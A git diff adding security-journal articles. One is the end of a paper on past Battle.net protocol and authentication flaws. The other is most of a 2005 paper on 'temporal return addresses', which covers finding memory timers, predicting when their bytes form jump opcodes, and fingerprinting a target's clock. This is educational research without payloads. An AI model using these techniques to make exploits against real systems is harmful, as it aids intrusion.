classes of +problems encountered by Blizzard as Battle.net has grown is that it was (in +the author's opinion) simply not designed to support the circumstances in +which it eventually ended up being used. This is evident in a variety of +events that have occurred over the past few years: + + - The addition of persistent player accounts to the system. + - The addition of the text-based chat protocol to the system. + - Significant changes to the backend architecture utilized by + Battle.net. + +Although it is difficult to provide exact details of these changes, having not +worked at Blizzard, many of them can be inferred. + + +3.1) Network issues + +Battle.net was originally setup as a small number of linked servers placed at +various strategic geographical locations. They were ``linked'' in the sense +that players on one server could interact with players on a different server +as seamlessly as with players connected to the same server. This architecture +eventually proved unsupportable, as increasing usage of Battle.net led to the +common occurrence of "server splits", in which one or more servers would be +unable to keep up with the rest of the network and become temporarily +disconnected. + +Eventually, the system was split into two separate networks (each starting +with a copy of all account and player data present at the time of the +division): The Asian network, and United States and European network. Each +network was comprised of a number of different servers that players could +connect to in an optimized fashion based on server response time. + +Some time later, even this system proved untenable. The network was once +again permanently fragmented, this time splitting the United States and +European network into three subnetworks. This is the topology retained today, +with the networks designated ``USEast'', ``USWest'', ``Europe'', ``Asia''. It +is believed that all servers in a server network (also referred to as a +``cluster'' or ``gateway'') are, at present, located at the same physical +hosting facility on a high-speed LAN. + +As new game requirements came about, a new architecture for Diablo II and +Warcraft III as required. In these cases, games are hosted on +Blizzard-operated servers and not on client machines in order to make them +more resilient from attempts to hack the game to gain an unfair advantage. +There are significant differences to how this is implemented for Diablo II and +Warcraft III, and it is not used for certain types of games in Warcraft III . +This resulted in a significant change to the way the service performs it's +primary function, that is, game matchmaking. + + +3.2) Client/Server issues + +Aside from the basic network design issues, other problems have arisen from +the fact that Blizzard did not expect, or intend for, third party programs to +use its Battle.net protocol. As a result, proper validation has not always +been in place for certain conditions that would not be generated through the +Blizzard client software. + +As mentioned earlier, many developers eventually turned to the using the +Battle.net protocol directly as opposed to the text-based protocol in order to +circumvent certain limitations in the text-based protocol. There are a number +of reasons for this. Historically, clients utilizing the Battle.net protocol +have been able to enter channels that are already full (private channels on +Battle.net have a limit of 40 users, normally), and have been able to perform +various account management functions (such as creating accounts, changing +passwords, managing user profile information, and so-forth) that are not +doable through the text-based protocol. + +In addition to having access to extended protocol-level functionality, clients +using the Battle.net protocol are permitted to open up to eight connections to +a single Battle.net network per IP address (as opposed to the text-based +protocol, which only allows a single connection per IP address). This limit +was originally four connections per IP address, and was raised after NATs, +particularly in cyber cafes, gained popularity. + +This was particularly attractive to a number of persons on Battle.net who used +third-party chat clients for a variety of reasons. The primary reason was +generally the same ``channel war'' phenomenon that has historically plagued +IRC was also rather prevalent on Battle.net, and being able to field a large +number of clients per IP address was seen as a significant advantage. + +Due to the prevalence of ``channel wars'' on Battle.net, artificially large +numbers of third-party clients utilizing the Battle.net protocol came into +use. Although it is difficult to estimate the exact number of users of such +clients, the author has observed upwards of several thousand being logged on +to the service at once. + +The development and usage of said third party clients has resulted in the +discovery of a number of other issues with Battle.net. While most of the +issues covered here are either already fixed or relatively minor, there is +still value in discussing them. + + +3.2.1) Client connection limits + +Through the use of certain messages in the Battle.net protocol, it is possible +to enter a channel beyond the normal 40 user limit. This was due to the fact +that the method a game client would use to return to a chat channel after +leaving a game would not properly check the user count. After miscreants +exploited this vulnerability to put thousands of users into one channel, which +subsequently lead to server crashes, Blizzard finally fixed this +vulnerability. + + +3.2.2) Chat message server overflow + +The server software often assumed that the client would only perform 'sane' +actions, and one of these assumptions dealt with how long of a chat message a +client could send. The server apparently copied a chat message indicated by a +Battle.net protocol client into a fixed 512-byte buffer without proper length +checking, such that a client could crash a server by sending a long enough +message. Due to the fact that Blizzard's server binaries are not publicly +available, it would not have been easy to exploit this flaw to run arbitrary +code on the server. This serious vulnerability was fixed within a day of +being reported. + + +3.2.3) Client authentication + +Aside from general sanity checks, Blizzard also has had some issues relating +to authentication. Blizzard currently has two systems in use for user account +password authentication. In order to create a third party client, these +systems had to be understood and third party implementations reduced. This +has revealed several flaws in their implementation. + +The first system Blizzard utilizes is challenge-response system that uses a +SHA-1 hash of the client's password. The game client implementation of this +system lowercases the entire password string before hashing it, significantly +reducing password security. (A third party client could opt not to do this, +and as such create an account that is impossible to log on to through the +official Blizzard game clients or the text-based protocol. The text-based +protocol sends a user's password in cleartext, after which the server +lowercases the password and internally compares a hash of it with the account +in question's password in a database.) However, a more serious security +problem remains: in SHA-1, there are a number of bit rotate left (``ROL'') +operations. The Blizzard programmer responsible for implementing this +apparently switched the two parameters in every call to ROL. That is, if +there was a ``define ROL(a, b) (...)'' macro, the programmer swapped the two +arguments. This drastically reduces the security of Battle.net password +hashes, as most of the data being hashed ends up being zero bits. Because of +the problem of incompatibility with previously created accounts, this system +is still in use today. + +The second system Blizzard utilizes is one based off of SRP (Secure Remote +Password, see http://srp.stanford.edu). Only Warcraft III and it's expansion +use this system for password authentication. This product has it's own +account namespace on Battle.net, so that there are no backwards compatibility +issues with the older ``broken SHA-1'' method. It is worth noting that +Warcraft III clients and older clients can still communicate via chat, however +- the server imposes a namespace decoration to client account names for +communication between namespaces, such that a client logged on as Warcraft III +would see a user ``User'' logged on as Starcraft on the USEast Battle.net +network as ``User@USEast''. However, this system is also flawed, albeit less +severely. In particular, the endian-ness of calculations is reversed, but +this is not properly accounted for in some parts of the implementation, such +that some operations expecting to remove trailing zero bits instead remove +leading zero bits after converting a large integer to a flat binary buffer. +There is a second flaw, as well, although it does not negatively impact the +security of the client: In some of the conversions from big numbers to flat +buffers, the server does not properly zero out bytes if the big number does +not occupy 32 non-zero bytes, and instead leaves uninitialized data in them. +The result is that some authentication attempts will randomly fail. As far as +the author knows, this bug is still present in Battle.net. + + +3.2.4) Client namespace spoofing + +With the release of Warcraft III, a separate account namespace was provided +for users of that product, as mentioned above. The server internally keeps +track of a user's account name as ``xusername'', where x is a digit specifying +an alternate namespace (the only currently known namespace designation is 'w', +for Warcraft III). This is known due to a message that exposes the internal +unique name for a user to protocol clients. While the character '' has never +been permitted in account names, if a user logs on to the same account more +than once, they are assigned a unique name of the format 'accountnameserial', +where 'serial' is a number that is incremented according to how many duplicate +logons of the same account there are. Due to a lack of parameter checking in +the account creation process, it was at one time possible to create +accounts,via a third party client, that were one character long (all of the +official game clients do not allow the user to do this). For some time, such +accounts confused the server into thinking that a user was actually on a +different (non-existent) namespace, and thus allowed a user who logged on to a +single character account more than once to become impossible to 'target' via +any of the user management functions. For example, such a user could not be +sent a private message, ignored, banned or kicked from a channel, or otherwise +affected by any other commands that operate on a specific user. This was, of +course, frequently abused to spam individuals with the victims being unable to +stop the spammer (or even ignore them!). This problem has been fixed in the +current server version. + + +3.2.5) Username collisions + +As referred to in the previuos sub-section, for some time the server allowed +Diablo Shareware clients. These clients did not log on to accounts, and +instead simply assigned themselves a username. Normal procedures were +followed if the username was already in use, which involved appending a serial +number to the end to make a unique name. Besides the obvious problem of being +able to impersonate someone to a user who was not clever enough to check what +game type one was logged on as, this creates an additional vulnerability that +was heavily exploited in ``channel wars''. If a server became split from the +rest of the network due to load, one could log on to that server using Diablo +Shareware, and pick the same name as someone logged on to the rest of the +network using a different game type. When the server split was resolved, the +server would notice that there were now two users with the same unique name, +and disconnect both of them with the ``Duplicate username detected.'' message +(this is synonymous with the ``colliding'' exploits of old that used to plague +IRC). This could be used to force users offline any time a server split +occurred. Being able to do so was desirable in the sense that there could +normally only be one channel operator in a channel at a time (barring server +splits, which could be used to create a second operator if the channel was +entirely emptied and then recreated on the split server). When that operator +left, the next person in line would be gifted with operator permissions +(unless the operator had explicitly 'designated' a new heir for operator +permissions). So, one could ``take over'' a channel by systematically +disconnecting those ``ahead of'' one's client in a channel. A channel is +ordered by a user's age in the channel. + + +3.2.6) Server de-synchronization + +At one time, a race condition such that if a malicious user were to log on to +two connected (i.e. not-split) servers at the same time, the two servers would +cease to communicate with another, causing a server split to occur. It is +difficult to provide an exact explanation for why this would occur given the +collision elimination mechanism described above for users that are logged on +with the same unique name, but it is assumed that in the process of +synchronizing a new user between servers, there is a period of time where that +a second server can also attempt to synchronize the same user and cause one of +the servers to get into a invalid state. According to observations, this +invalid state would eventually be resolved automatically, usually after 10-15 +minutes. + + +3.2.7) Seeing invisible users + +Battle.net administrators have the ability to become invisible to normal +users. However, until recently, this was flawed in that the server would +expose the existence of an invisible user to regular users during certain +operations. In particular, if one ignores or unignores a user, the server +will re-send the state of all users that are ignored or unignored in the +current channel. Before this bug was fixed, this list included any invisible +users. It is worth noting that the official game clients will ignore any +unknown users returned in the state update message, so this vulnerability +could only be utilized by a third party client. + + +3.2.8) Administrative command discovery + +Originally, Battle.net would provide no acknowledgement if one issued an +unrecognized chat command ("slash-command"). Blizzard later changed the +server software to respond with an error message if a user sent an unknown +command, but the server originally silently ignored the command if the user +issued a privileged (administrator-only) command. This allowed end users to +discover the names of various commands accessible to system administrators. + + +3.2.9) Gaining administrative privileges + +Due to an oversight in the way administrator permissions are assigned to +Battle.net accounts, it was at one time possible to overwrite the account of +an administrator with a new account and keep the special permissions otherwise +associated with the account. (An account can be overwritten like so if it has +not been accessed in 90 days). This could have very nearly resulted in a +disaster for Blizzard, had a more malicious user discovered this vulnerability +and abused such privileges. + + +3.2.10) Obtaining passwords + +Eventually, Blizzard implemented a password recovery mechanism whereby one +could associate an e-mail address with an account, and request a password +change through the Battle.net protocol for an account at logon time. This +would result in an e-mail being dispatched to the registered address. If the +user then replied to the mail as instructed, they would be automatically +mailed back with a new account password. Unfortunately, as originally +implemented, this system did not properly perform validation on the +confirmation mail that the user was required to send. In particular, if a +malicious user created an account ``victim'' on one Battle.net network, such +as the Asian network, and then requested a password reset for that account, +they could alter the return email slightly and actually reset the password for +the account ``victim'' on a different Battle.net network, such as the USEast +network. This exploit was actually publicly disclosed and saw over a day of +heavy abuse before Blizzard managed to patch it. + + +4) Battle.net server emulation + +Blizzard 'declared war' on the programmers of servers that implement the +Battle.net protocol some time ago when they took the developers of ``bnetd'' +to court. As of Warcraft III, they have taken active measures to make life +difficult for developers programming third party Battle.net-compatible +servers. In particular, two actions are of note: + +During the Warcraft III Expansion beta test, Blizzard implemented an +encryption scheme for the Battle.net protocol (this was only used during the +beta test and not on production Battle.net). This consisted of using the RC4 +cipher to encrypt messages send and received from the server. The tricky part +was that Blizzard had hardcoded constants that were encrypted using the cipher +state, but never actually sent on the wire (these constants were different for +each message). This made implementing a server difficult, as one had to find +each magic constant. Unfortunately, Blizzard neglected to consider the policy +of someone releasing a hacked version of the client that zeroed the RC4 +initialization parameters, such that the entire encrypted stream became +plaintext. + +After several patches, Blizzard implemented a scheme by which a Warcraft III +client could verify that it was indeed connecting to a genuine Blizzard +Battle.net server. This scheme worked by having the Battle.net server sign +it's IP address and send the resulting signature to the client, which would +refuse to log on if the server's IP address did not match the signature. +However, in the original implementation, the game client only checked the +first four bytes of the signed data, and did not validate the remaining +(normally zero) 124 bytes. This allows one to easily brute-force a signature +that has a designed IP address, as one only has to check 32 bits of possible +signatures at most to find it. + + +5) Conclusion + +Developing a platform to support a diverse set of requirements such as +Battle.net is certainly no easy task. Though the original design could have +perhaps been improved upon, it is the author's opinion that given what they +had to work with, Blizzard did a reasonable job of ensuring that the service +they set out to create stood the test of time, especially considering that +support for all the future features of their later game clients could not have +been predicted at the time the system was originally created. Nevertheless, it +is the author's opinion that a system designed where clients are untrusted and +all actions performed by them are subject to full validation would have been +far more secure from the start, without any of the various problems Blizzard +has encountered over the years. diff --git a/uninformed/2.2.txt b/uninformed/2.2.txt new file mode 100644 index 0000000..44b7ecc --- /dev/null +++ b/uninformed/2.2.txt @@ -0,0 +1,971 @@ +Temporal Return Addresses: Exploitation Chronomancy +skape +mmiller@hick.org +Last modified: 8/6/2005 + + +1) Foreword + +Abstract: Nearly all existing exploitation vectors depend on some knowledge of +a process' address space prior to an attack in order to gain meaningful +control of execution flow. In cases where this is necessary, exploit authors +generally make use of static addresses that may or may not be portable between +various operating system and application revisions. This fact can make +exploits unreliable depending on how well researched the static addresses were +at the time that the exploit was implemented. In some cases, though, it may +be possible to predict and make use of certain addresses in memory that do not +have static contents. This document introduces the concept of temporal +addresses and describes how they can be used, under certain circumstances, to +make exploitation more reliable. + +Disclaimer: This document was written in the interest of education. The +author cannot be held responsible for how the topics discussed in this +document are applied. + +Thanks: The author would like to thank H D Moore, spoonm, thief, jhind, +johnycsh, vlad902, warlord, trew, vax, uninformed, and all the friends of +nologin! + +With that, on with the show... + + +2) Introduction + +A common impediment to the implementation of portable and reliable exploits is +the location of a return address. It is often required that a specific +instruction, such as a jmp esp, be located at a predictable location in memory +so that control flow can be redirected into an attacker controlled buffer. +This scenario is more common on Windows, but applicable scenarios exist on +UNIX derivatives as well. Many times, though, the locations of the +instructions will vary between individual versions of an operating system, +thus limiting an exploit to a set of version-specific targets that may or may +not be directly determinable at attack time. In order to make an exploit +independent of, or at least less dependent on, a target's operating system +version, a shift in focus becomes necessary. + +Through the blur of rhyme and reason an attacker might focus and realize that +not all viable return addresses will exist indeterminably in a target process' +address space. In fact, viable return addresses can be found in a transient +state throughout the course of a program's execution. For instance, a pointer +might be stored at a location in memory that happens to contain a viable two +byte instruction somewhere within the bytes that compose the pointer's +address. Alternatively, an integer value somewhere in memory could be +initialized to a value that is equivalent to a viable instruction. In both +cases, though, the contents and locations of the values will almost certainly +be volatile and unpredictable, thus making them unsuitable for use as return +addresses. + +Fortunately, however, there does exist at least one condition that can lend +itself well to portable exploitation that is bounded not by the operating +system version the target is running on, but instead by a defined window of +time. In a condition such as this, a timer of some sort must exist at a +predictable location in memory that is known to be updated at a constant time +interval, such as every second. The location in memory that the timer resides +at is known as a temporal address. On top of this, it is also important for +the attacker determine the scale of measurement the timer is operating on, +such as whether or not it's measured in epoch time (from 1970 or 1601) or if +it's simply acting as a counter. With these three elements identified, an +attacker can attempt to predict the periods of time where a useful instruction +can be found in the bytes that compose the future state of any timer in +memory. + +To help illustrate this, suppose an attacker is attempting to find a reliable +location of a jmp edi instruction. The attacker knows that the program being +exploited has a timer that holds the number of seconds since Jan. 1, 1970 at a +predictable location in memory. By doing some analysis, the attacker could +determine that on Wednesday July 27th, 2005 at 3:39:12PM CDT, a jmp edi could +be found within any four byte timer that stores the number of seconds since +1970. The window of opportunity, however, would only last for 4 minutes and 16 +seconds assuming the timer is updated every second. + +By accounting for timing as a factor in the selection of return addresses, an +attacker can be afforded options beyond those normally seen when the address +space of a process is viewed as unchanging over time. In that light, this +document is broken into three portions. First, the steps needed to find, +analyze, and make use of temporal addresses will be explained. Second, +upcoming viable opcode windows will be shown and explained along with methods +that can be used to determine target time information prior to exploitation. +Finally, examples of commonly occurring temporal addresses on Windows NT+ will +be described and analyzed to provide real world examples of the subject of +this document. + +Before starting, though, it is important to understand some of the terminology +that will be used, or perhaps abused, in the interest of conveying the +concepts. The term temporal address is used to describe a location in memory +that contains a timer of some sort. The term opcode is used interchangeably +with the term instruction to convey the set of viable bytes that could +partially compose a given temporal state. The term update period is used to +describe the amount of time that it takes for the contents of a temporal +address to change. Finally, the term scale is used to describe the unit of +measure for a given temporal address. + + +3) Locating Temporal Addresses + +In order to make use of temporal addresses it is first necessary to devise a +method of locating them. To begin this search it is necessary that one +understand the attributes of a temporal address. All temporal addresses are +defined as storing a time-associated counter that increments at a constant +interval. For instance, an example would be a location in memory that stores +the number of seconds since Jan. 1, 1970 that is incremented every second. As +a more concrete definition, all time-associated counters found in memory are +represented in terms of a scale (the unit of measure), an interval or period +(how often they are updated), and have a maximum storage capacity (variable +size). If any these parts are unknown or variant for a given memory location, +it is impossible for an attacker to consistently leverage it for use as +time-bounded return address because of the inability to predict the byte +values at the location for a given period of time. + +With the three major components of a temporal address identified (scale, +period, and capacity), a program can be written to search through a process' +address space with the goal of identifying regions of memory that are updated +at a constant period. From there, a scale and capacity can be inferred based +on an arbitrarily complex set of heuristics, the simplest of which can +identify regions that are storing epoch time. It's important to note, though, +that not all temporal addresses will have a scale that is measured as an +absolute time period. Instead, a temporal address may simply store the number +of seconds that have passed since the start of execution, among other +scenarios. These temporal addresses are described as having a scale that is +simply equivalent to their period and are for that reason referred to as +counters. + +To illustrate the feasibility of such a program, the author has implemented an +algorithm that should be conceptually portable to all platforms, though the +implementation itself is limited to Windows NT+. The approach taken by the +author, at a high level, is to poll a process' address space multiple times +with the intention of analyzing changes to the address space over time. In +order to reduce the amount of memory that must be polled, the program is also +designed to skip over regions that are backed against an image file or are +otherwise inaccessible. + +To accomplish this task, each polling cycle is designed to be separated by a +constant (or nearly constant) time interval, such as 5 seconds. By increasing +the interval between polling cycles the program can detect temporal addresses +that have a larger update period. The granularity of this period of time is +measured in nanoseconds in order to support high resolution timers that may +exist within the target process' address space. This allows the program to +detect timers measured in nanoseconds, microseconds, milliseconds, and +seconds. The purpose of the delay between polling cycles is to give temporal +address candidates the ability to complete one or more update periods. As +each polling cycle occurs, the program reads the contents of the target +process' address space for a given region and caches it locally within the +scanning process. This is necessary for the next phase. + +After at least two polling cycles have completed, the program can compare the +cached memory region differences between the most recent view of the target +process' address space and the previous view. This is accomplished by walking +through the contents of each cached memory region in four byte increments to +see if there is any difference between the two views. If a temporal address +exists, the contents of a the two views should have a difference that is no +larger than the maximum period of time that occurred between the two polling +cycles. It's important to remember that the maximum period can be conveyed +down to nanosecond granularity. For instance, if the polling cycle period was +5 seconds, any portion of memory that changed by more than 5 seconds, 5000 +milliseconds, or 5000000 microseconds is obviously not a temporal address +candidate. To that point, any region of memory that didn't change at all is +also most likely not a temporal address candidate, though it is possible that +the region of memory simply has an update period that is longer than the +polling cycle. + +Once a memory location is identified that has a difference between the two +views that is within or equal to the polling cycle period, the next step of +analysis can begin. It's perfectly possible for memory locations that meet +this requirement to not actually be timers, so further analysis is necessary +to weed them out. At this point, though, memory locations such as these can +be referred to as temporal address candidates. The next step is to attempt to +determine the period of the temporal address candidate. This is accomplished +by some rather silly, but functional, logic. + +First, the delta between the polling cycles is calculated down to nanosecond +granularity. In a best case scenario, the granularity of a polling cycle that +is spaced apart by 5 seconds will be 5000000000 nanoseconds. It's not safe to +assume this constant though, as thread scheduling and other non-constant +parameters can affect the delta between polling cycles for a given memory +region. The next step is to iteratively compare the difference between the +two views to the current delta to see if the difference is greater than or +equal to the current delta. If it is, it can be assumed that the difference +is within the current unit of measure. If it's not, the current delta should +be divided by 10 to progress to the next unit of measure. When broken down, +the progressive transition in units of measurement is described in figure 3.1. + + + Delta Measurement + --------------------------- + 1000000000 Nanoseconds + 100000000 10 Nanoseconds + 10000000 100 Nanoseconds + 1000000 Microseconds + 100000 10 Microseconds + 10000 100 Microseconds + 1000 Milliseconds + 100 10 Milliseconds + 10 100 Milliseconds + 1 Seconds + + Figure 3.1: Delta measurement reductions + + +Once a unit of measure for the update period is identified, the difference is +divided by the current delta to produce the update period for a given temporal +address candidate. For example, if the difference was 5 and the current delta +was 5, the update period for the temporal address candidate would be 1 second +(5 updates over the course of 5 seconds). With the update period identified, +the next step is to attempt to determine the storage capacity of the temporal +address candidate. + +In this case, the author chose to take a shortcut, though there are most +certainly better approaches that could be taken given sufficient interest. +The author chose to assume that if the update period for a temporal address +candidate was measured in nanoseconds, then it was almost certainly at least +the size of a 64-bit integer (8 bytes on x86). On the other hand, all other +update periods were assumed to imply a 32-bit integer (4 bytes on x86). + +With the temporal address candidate's storage capacity identified in terms of +bytes, the next step is to identify the scale that the temporal address may be +conveying (the timer's unit of measure). To accomplish this, the program +calculates the number of seconds since 1970 and 1601 between the current time +minus at least equal the polling cycle period and the current time itself. +The temporal address candidate's current value (as stored in memory) is then +converted to seconds using the determined update period and then compared +against the two epoch time ranges. If the candidate's converted current value +is within either epoch time range then it can most likely be assumed that the +temporal address candidates's scale is measured from epoch time, either from +1970 or 1601 depending on the range it was within. While this sort of +comparison is rather simple, any other arbitrarily complex set of logic could +be put into place to detect other types of time scales. In the event that +none of the logic matches, the temporal address candidate is deemed to simply +have a scale of a counter (as defined previously in this chapter). + +Finally, with the period, scale, and capacity for the temporal address +candidate identified, the only thing left is to check to see if the three +components are equivalent to previously collected components for the given +temporal address candidate. If they differ in orders of magnitude then it is +probably safe to assume that the candidate is not actually a temporal address. +On the other, consistent components between polling cycles for a temporal +address candidate are almost a sure sign that it is indeed a temporal address. + +When everything is said and done, the program should collect every temporal +address in the target process that has an update period less than or equal to +the polling cycle period. It should also have determined the scale and size +of the temporal address. When run on Windows against a program that is +storing the current epoch time since 1970 in seconds in a variable every +second, the following output is displayed: + + +C:\>telescope 2620 +[*] Attaching to process 2620 (5 polling cycles)... +[*] Polling address space........ + +Temporal address locations: + +0x0012FE88 [Size=4, Scale=Counter, Period=1 sec] +0x0012FF7C [Size=4, Scale=Epoch (1970), Period=1 sec] +0x7FFE0000 [Size=4, Scale=Counter, Period=600 msec] +0x7FFE0014 [Size=8, Scale=Epoch (1601), Period=100 nsec] + + +This output tells us that the address of the variable that is storing the +epoch time since 1970 can be found at 0x0012FF7C and has an update period of +one second. The other things that were found will be discussed later in this +document. + + +3.1) Determining Per-byte Durations + +Once the update period and size of a temporal address have been determined, it +is possible to calculate the amount of time it takes to change each byte +position in the temporal address. For instance, if a four byte temporal +address with an update period of 1 second were found in memory, the first byte +(or LSB) would change once every second, the second byte would change once +every 256 seconds, the third byte would change once every 65536 seconds, and +the fourth byte would change once every 16777216 seconds. The reason these +properties are exhibited is because each byte position has 256 possibilities +(0x00 to 0xff inclusive). This means that each byte position increases in +duration by 256 to a given power. This can be described as shown in figure +3.2. Let x equal the byte index starting at zero for the LSB. + + + duration(x) = 256 ^ x + + Figure 3.2: Period independent byte durations + +The next step to take after determining period-specific byte durations is to +convert the durations to a measure more aptly accessible assuming a period +that is more granular than a second. For instance, figure shows that if each +byte duration is measured in 100 nanosecond intervals for an 8 byte temporal +address, a conversion can be applied to convert from 100 nanosecond intervals +for a byte duration to seconds. + + + tosec(x) = duration(x)/107 + + Figure 3.3: 100 nanosecond byte durations to seconds + + +This phase is especially important when it comes to calculating viable opcode +windows because it is necessary to know for how long a viable opcode will +exist which is directly dependent on the direction of the opcode byte closest +to the LSB. This will be discussed in more detail in chapter 4. + + +4) Calculating Viable Opcode Windows + +Once a set of temporal addresses has been located, the next logical step is to +attempt to calculate the windows of time that one or more viable opcodes can +be found within the bytes of the temporal address. It is also just as +important to calculate the duration of each byte within the temporal address. +This is the type of information that is required in order to determine when a +portion of a temporal address can be used as a return address for an exploit. +The approach taken to accomplish this is to make use of the equations provided +in the previous chapter for calculating the number of seconds it takes for +each byte to change based on the update period for a given temporal address. +By using the tosec function for each byte index, a table can be created as +illustrated in figure 4.1 for a 100nanosecond 8 byte timer. + + + Byte Index Seconds (ext) + ------------------------ + 0 0 (zero) + 1 0 (zero) + 2 0 (zero) + 3 1 (1 sec) + 4 429 (7 mins 9 secs) + 5 109951 (1 day 6 hours 32 mins 31 secs) + 6 28147497 (325 days 18 hours 44 mins 57 secs) + 7 7205759403 (228 years 179 days 23 hours 50 mins 3 secs) + + Figure 4.1: 8 byte 100ns per-byte durations in seconds + + +This shows that any opcodes starting at byte index 4 will have a 7 minute and +9 second window of time. The only thing left to do is figure out when to +strike. + + +5) Picking the Time to Strike + +The time to attack is entirely dependent on both the update period of the +temporal address and its scale. In most cases, temporal addresses that have a +scale that is relative to an arbitrary date (such as 1970 or 1601) are the +most useful because they can be predicted or determined with some degree of +certainty. Regardless, a generalized approach can be used to determine +projected time intervals where useful opcodes will occur. + +To do this, it is first necessary to identify the set of instructions that +could be useful for a given exploit, such as a jmp esp. Once identified, the +next step is to break the instructions down into their raw opcodes, such as +0xff 0xe4 for jmp esp. After all the raw opcodes have been collected, it is +then necessary to begin calculating the projected time intervals that the +bytes will occur at. The method used to accomplish this is rather simple. + +First, a starting byte index must be determined in terms of the lowest +acceptable window of time that an exploit can use. In the case of a 100 +nanosecond timer, the best byte index to start at would be byte index 4 +considering all previous indexes have a duration of less than or equal to one +second. The bytes that occur at index 4 have a 7 minute and 9 second +duration, thus making them feasible for use. With the starting byte index +determined, the next step is to create permutations of all subsequent opcode +byte combinations. In simpler terms, this would mean producing all of the +possible byte value combinations that contain the raw opcodes of a given +instruction at a byte index equal to or greater than the starting byte index. +To help visualize this, figure 5.1 provides a small sample of jmp esp byte +combinations in relation to a 100 nanosecond timer. + + + Byte combinations + ----------------------- + 00 00 00 00 ff e4 00 00 + 00 00 00 00 ff e4 01 00 + 00 00 00 00 ff e4 02 00 + ... + 00 00 00 00 ff e4 47 04 + 00 00 00 00 ff e4 47 05 + 00 00 00 00 ff e4 47 06 + ... + 00 00 00 00 00 ff e4 00 + 00 00 00 00 00 ff e4 01 + 00 00 00 00 00 ff e4 02 + + Figure 5.1: 8 byte 100ns jmp esp byte combinations + + +Once all of the permutations have been generated, the next step is to convert +them to meaingful absolute time representations. This is accomplished by +converting all of the permutations, which represent past, future, or present +states of the temporal address, to seconds. For instance, one of the +permutations for a jmp esp instruction found within the 64-bit 100nanosecond +timer is 0x019de4ff00000000 (116500949249294300). Converting this to seconds +is accomplished by doing: + + + 11650094924 = trunc(116500949249294300 / 10^7) + + +This tells us the number of seconds that will have passed when the stars align +to form this byte combination, but it does not convey the scale in which the +seconds are measured, such as whether they are based from an absolute date +(such as 1970 or 1601) or are simply acting as a timer. In this case, if the +scale were defined as being the number of seconds since 1601, the total number +of seconds could be adjusted to indicate the number of seconds that have +occurred since 1970 by subtracting the constant number of seconds between 1970 +and 1601: + + + 5621324 = 11650094924 - 11644473600 + + +This indicates that a total of 5621324 seconds will have passed since 1970 +when 0xff will be found at byte index 4 and 0xe4 will be found at byte index +5. The window of opportunity will be 7 minutes and 9 seconds after which +point the 0xff will become a 0x00, the 0xe4 will become 0xe5, and the +instruction will no longer be usable. If 5621324 is converted to a printable +date format based on the number of seconds since 1970, one can find that the +date that this particular permutation will occur at is Fri Mar 06 19:28:44 CST +1970. + +While it's now been shown that is perfectly possible to predict specific times +in the past, present, and future that a given instruction or instructions can +be found within a temporal address, such an ability is not useful without +being able to predict or determine the state of the temporal address on a +target computer at a specific moment in time. For instance, while an +exploitation chronomancer knows that a jmp esp can be found on March 6th, 1970 +at about 7:30 PM, it must also be known what the target machine has their +system time set to down to a granularity of mere seconds, or at least minutes. +While guessing is always an option, it is almost certainly going to be less +fruitful than making use of existing tools and services that are more than +willing to provide a would-be attacker with information about the current +system time on a target machine. Some of the approaches that can be taken to +gather this information will be discussed in the next section. + + +5.1) Determining System Time + +There are a variety of techniques that can potentially be used to determine +the system time of a target machine with varying degrees of accuracy. The +techniques listed in this section are by no means all-encompassing but do +serve as a good base. Each technique will be elaborated on in the following +sub-sections. + + +5.1.1) DCERPC SrvSvc NetrRemoteTOD + +One approach that can be taken to obtain very granular information about the +current system time of a target machine is to use the SrvSvc's NetrRemoteTOD +request. To transmit this request to a target machine a NULL session (or +authenticated session) must be established using the standard Session Setup +AndX SMB request. After that, a Tree Connect AndX to the IPC share should be +issued. From there, an NT Create AndX request can be issued on the named +pipe. Once the request is handled successfully the file descriptor returned +can be used for the DCERPC bind request to the SrvSvc's UUID. Finally, once +the bind request has completed successfully, a NetrRemoteTOD request can be +transacted over the named pipe using a TransactNmPipe request. The response +to this request should contain very granular information, such as day, hour, +minute, second, timezone, as well as other fields that are needed to determine +the target machine's system time. Figure shows a sample response. + +This vector is very useful because it provides easy access to the complete +state of a target machine's system time which in turn can be used to calculate +the windows of time that a temporal address can be used during exploitation. +The negatives to this approach is that it requires access to the SMB ports +(either 139 or 445) which will most likely be inaccessible to an attacker. + + +5.1.2) ICMP Timestamps + +The ICMP TIMESTAMP request (13) can be used to obtain a machine's measurement +of the number of milliseconds that have occurred since midnight UT. If an +attacker can infer or assume that a target machine's system time is set to a +specific date and timezone, it may be possible to calculate the absolute +system time down to a millisecond resolution. This would satisfy the timing +requirements and make it possible to make use of temporal addresses that have +a scale that is measured from an absolute time. According to the RFC, though, +if a system is unable to determine the number of milliseconds since UT then it +can use another value capable of representing time (though it must set a +high-order bit to indicate the non-standard value). + + +5.1.3) IP Timestamp Option + +Like the ICMP TIMESTAMP request, IP also has a timestamp option (type 68) that +measures the number of milliseconds since midnight UT. This could also be used +to determine down to a millisecond resolution what the remote system's clock +is set to. Since the measurement is the same, the limitations are the same as +ICMP's TIMESTAMP request. + + +5.1.4) HTTP Server Date Header + +In scenarios where a target machine is running an HTTP server, it may be +possible to extract the system time by simply sending an HTTP request and +checking to see if the response contains a date header or not. Figure shows +an example HTTP response that contains a date header. + + +5.1.5) IRC CTCP TIME + +Perhaps one of the more lame approaches to obtaining a target machine's time +is by issuing a CTCP TIME request over IRC. This request is designed to +instruct the responder to reply with a readable date string that is relative +to the responder's system time. Unless spoofed, the response should be +equivalent to the system time on the remote machine. + + +6) Determining the Return Address + +Once all the preliminary work of calculating all of the viable opcode windows +has been completed and a target machine's system time has been determined, the +final step is to select the next available window for a compatible opcode +group. For instance, if the next window for a jmp esp equivalent instruction +is Sun Sep 25 22:37:28 CDT 2005, then the byte index to the start of the jmp +esp equivalent must be determined based on the permutation that was generated. +In this case, the permutation that would have been generated (assuming a +100nanosecond period since 1601) is 0x01c5c25400000000. This means that jmp +esp equivalent is actually a push esp, ret which starts at byte index four. +If the start of the temporal address was at 0x7ffe0014, then the return +address that should be used in order to get the push esp, ret to execute would +be 0x7ffe0018. This basic approach is common to all temporal addresses of +varying capacity, period, and scale. + + +7) Case Study: Windows NT SharedUserData + +With all the generic background information out of the way, a real world +practical use of this technique can be illustrated through an analysis of a +region of memory that happens to be found in every process on Windows NT+. +This region of memory is referred to as SharedUserData and has a backward +compatible format for all versions of NT, though new fields have been appended +over time. At present, the data structure that represents SharedUserData is +KUSERSHAREDDATA which is defined as follows on Windows XP SP2: + + +0:000> dt _KUSER_SHARED_DATA + +0x000 TickCountLow : Uint4B + +0x004 TickCountMultiplier : Uint4B + +0x008 